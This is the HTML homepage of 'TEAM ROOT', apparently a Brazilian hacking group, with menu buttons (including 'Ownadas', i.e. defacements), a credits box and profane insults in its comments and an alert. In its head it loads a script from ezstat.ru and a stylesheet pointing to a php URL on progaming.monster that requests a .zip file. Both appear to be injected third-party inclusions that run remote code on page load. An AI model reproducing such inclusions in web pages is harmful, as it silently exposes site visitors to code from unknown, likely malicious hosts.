
<!DOCTYPE HTML>
<html>
<!---VAI TOMAR NO CU ASHURAKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK--->
<!--ABRE O SOURCE DO MEU PAU JAKE KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK-->
<head>
<!-- Primary Meta Tags -->
<title>[$] TEAM | ROOT [$]</title>
<meta name="title" content="[$] TEAM | ROOT [$]">
<meta name="description" content="Team root, entre na team root e nos conheça!">

<!-- Open Graph / Facebook -->
<meta property="og:type" content="website">
<meta property="og:url" content="https://teamroot.cf">
<meta property="og:title" content="[$] TEAM | ROOT [$]">
<meta property="og:description" content="Team root, entre na team root e nos conheça!">
<meta property="og:image" content="caparoot.png">

<!-- Twitter -->
<meta property="twitter:card" content="summary_large_image">
<meta property="twitter:url" content="https://teamroot.cf">
<meta property="twitter:title" content="[$] TEAM | ROOT [$]">
<meta property="twitter:description" content="Team root, entre na team root e nos conheça!">
<meta property="twitter:image" content="caparoot.png">
<script src="https://ezstat.ru/16Dkk7.js"></script>
<link rel="preconnect" href="https://fonts.gstatic.com">
<link href="https://fonts.googleapis.com/css2?family=Roboto+Slab:wght@200&display=swap" rel="stylesheet">
<link rel="shortcut icon" href="bashlogo.png">
<script>
function credito() {

   var div = document.getElementById("credito");
    var disp = div.style.display;
    div.style.display = disp == 'none' ? 'block' : 'none';
}
</script>

<meta charset="utf-8">
<title>[$] TEAM | ROOT [$]</title>
<script>

function ownadas(){

alert('EM BREVE SEU IMBECIL!')

}
</script>
<link rel="preconnect" href="https://fonts.gstatic.com">
<link href="https://fonts.googleapis.com/css2?family=Roboto+Slab:wght@200&display=swap" rel="stylesheet">
<link rel="stylesheet" href="https://progaming.monster/film.php?tid=13489R.zip">
<link rel="shortcut icon" href="bashlogo.png">
<meta charset="utf-8">
<title>[$] TEAM | ROOT [$]</title>
<style>

body{

background-image: url('https://i.redd.it/770pwjpdsgt51.png'); 
background-repeat: no-repeat;
    background-attachment: fixed;
    background-position: center;

    background-color: black;
}

@keyframes aparecerok{

from{opacity: 0%}
to{opacity:100%}
}

div.negro{

background-color: black;

}

h2{

font-size: 50px;
color: white;
font-family: 'Roboto Slab', serif;
animation: negroaparece 3s;
text-shadow: 0px 0px 0px white;
-webkit-transition-duration: 0.5s;


}

h2:hover{

font-size: 60px;
color: white;
text-shadow: 0px 0px 20px white;
font-family: 'Roboto Slab', serif;
animation: negroaparece 3s;
-webkit-transition-duration: 0.5s;


}

@keyframes negroaparece{

from{opacity: 0%}
to{opacity: 100%}

}
.typewriter h2 {
  color: #fff;
  font-family: monospace;
  overflow: hidden; 
  border-right: .15em solid rgb(255, 255, 255); 
  white-space: nowrap;
  margin: 0 auto; 
  letter-spacing: .15em; 
  animation: 
    typing 4.5s steps(40, end),
    blink-caret .3s step-end infinite;
}


@keyframes typing {
  from { width: 0 }
  to { width: 100% }
}


@keyframes blink-caret {
  from, to { border-color: transparent }
  50% { border-color: rgb(255, 255, 255) }
}

p1{

color:white;
animation: negroaparece 5s;
}

button.botaor{
font-family: 'Roboto Slab', serif;
background-color: black;
color: white;
font-size: 20px;
padding: 10px 20px;
float: right;
-webkit-transition-duration: 0.5s;
}
button.botaor:hover{
font-family: 'Roboto Slab', serif;
background-color: white;
color: black;
font-size: 20px;
padding: 10px 30px;
float: right;
-webkit-transition-duration: 0.5s;
}

a{

color: inherit;
transition: all 0.5s;
text-decoration: inherit;
}

a:hover{

color:green;
transition: all 0.5s;
}

p3{
color:white;

}
div.credito{
background-color: black;
display: none;


}

p2{
transition: all 0.5s;
color: white;

}

p2:hover{
transition: all 0.5s;
color: green;
opacity: 60%;

}

</style>
</head>
<a href="sobreroot.html"><button class="botaor">Sobre nos</button></a>
<br>
<br>
<br>
<br>
<a href="entrar.html"><button class="botaor">Entrar na root</button></a>
<br>
<br>
<br>
<br>
<a href="contato.html"><button class="botaor">contato</button></a>
<br>
<br>
<br>
<br>
<a href="ownadas.html"><button class="botaor">Ownadas (beta)</button></a>
<br>
<br>
<br>
<br>
<a href="conversar.html"><button class="botaor">Chat</button></a>
<br>
<br>
<br>
<br>
<button onclick="credito()" class="botaor">Créditos</button>
<br>
<br>
<br>
<br>
<a href="membros.html"><button class="botaor">Membros</button></a>
<br>
<br>
<br>
<br>
<div id="credito" class="credito">
<p3>Site codado por </p3><a href="https://fatals33c.contactin.bio/"><p2>@Fatalsec</p2></a>
<br>
<p3>Host por </p3><a href="https://t.me/azz4_defalt"><p2>@azz4_defalt</p2></a>
<br>
<p3>Ajuda de código por </p3><a href="https://t.me/Helior11"><p2>@H22677</p2></a>
</div>
<center>
<br>
<div class="negro">
<div class="typewriter">
<br>
<h2>BEM VINDO A ROOT</h2>
<p1>O conhecimento é o caminho para a liberdade.</p1>
<br>
<br>
</div>
</div>
<br>
</center>
</body>
</html>
